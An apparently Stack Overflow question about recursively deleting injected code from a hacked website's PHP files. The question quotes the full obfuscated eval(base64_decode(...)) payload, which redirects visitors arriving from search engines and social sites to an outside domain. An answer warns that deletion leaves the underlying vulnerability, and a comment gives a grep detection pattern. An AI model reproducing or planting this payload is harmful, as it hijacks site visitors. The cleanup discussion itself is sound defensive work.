# UNIX find and replace taking a long string as a search parameter from the file and searching in multiple directories recursively?

Tags: unix, replace

I need to find all occurences of the string that is saved in the file (hack.txt) in the multiple nested directories and replace it with an empty space (delete it).

hack.txt:

```
eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikgYW5kICFzdHJzdHIoJHVhZywiRmlyZWZveC8zLiIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vLiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmcuIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlci4iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhLiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInQuY28vIikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbS9sIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpIG9yIChwcmVnX21hdGNoICgiL2h0dHBzOlwvXC93d3cuZ29vZ2xlXC4oLio/KVwvLyIsJHJlZmVyZXIpIGFuZCBzdHJzdHIoJHVhZywiQ2hyb21lLyIpKSkgewppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgYW5kICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiRWVZcDNENyIpKXsKaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2luZGlnd2VvcmxzLmRkbnMuaW5mby8iKTsKZXhpdCgpOwp9Cn0KfQp9Cn0="));
```

How can I do that with unix command?

Thanks!

Comment: Look at this: http://stackoverflow.com/questions/3169538/how-to-do-multi-file-find-and-replace-from-unix-prompt?rq=1. Then try it with your situation. Then post back if it did not work for some reason.

Comment: possible duplicate of [Sed - Delete a line containing a specific string](http://stackoverflow.com/questions/5410757/sed-delete-a-line-containing-a-specific-string)

Comment: Hi, I'm not clear on how to get the inputs of the hack.txt as a search parameter? I've tried $(<./hack.txt), but it didn't work...

Answer (score 1, accepted):

It's relatively trivial, and already described in [lots](http://en.kioskea.net/faq/1451-sed-delete-one-or-more-lines-from-a-file) of [places](http://www.tuxradar.com/answers/391) including [here](https://stackoverflow.com/questions/5410757/sed-delete-a-line-containing-a-specific-string) on stack overflow - however **THIS IS NOT GOING TO FIX THE VULNERABILITY IN YOUR SITE**

Comment: Thanks for reply! I'm not clear on how to take a contents of the file as a parameter to search for! Could you give some examples please?

Comment: You don't use the entire contents - just a pattern, e.g. /eval.base64_decode([^;])*;/ - try it out with grep first.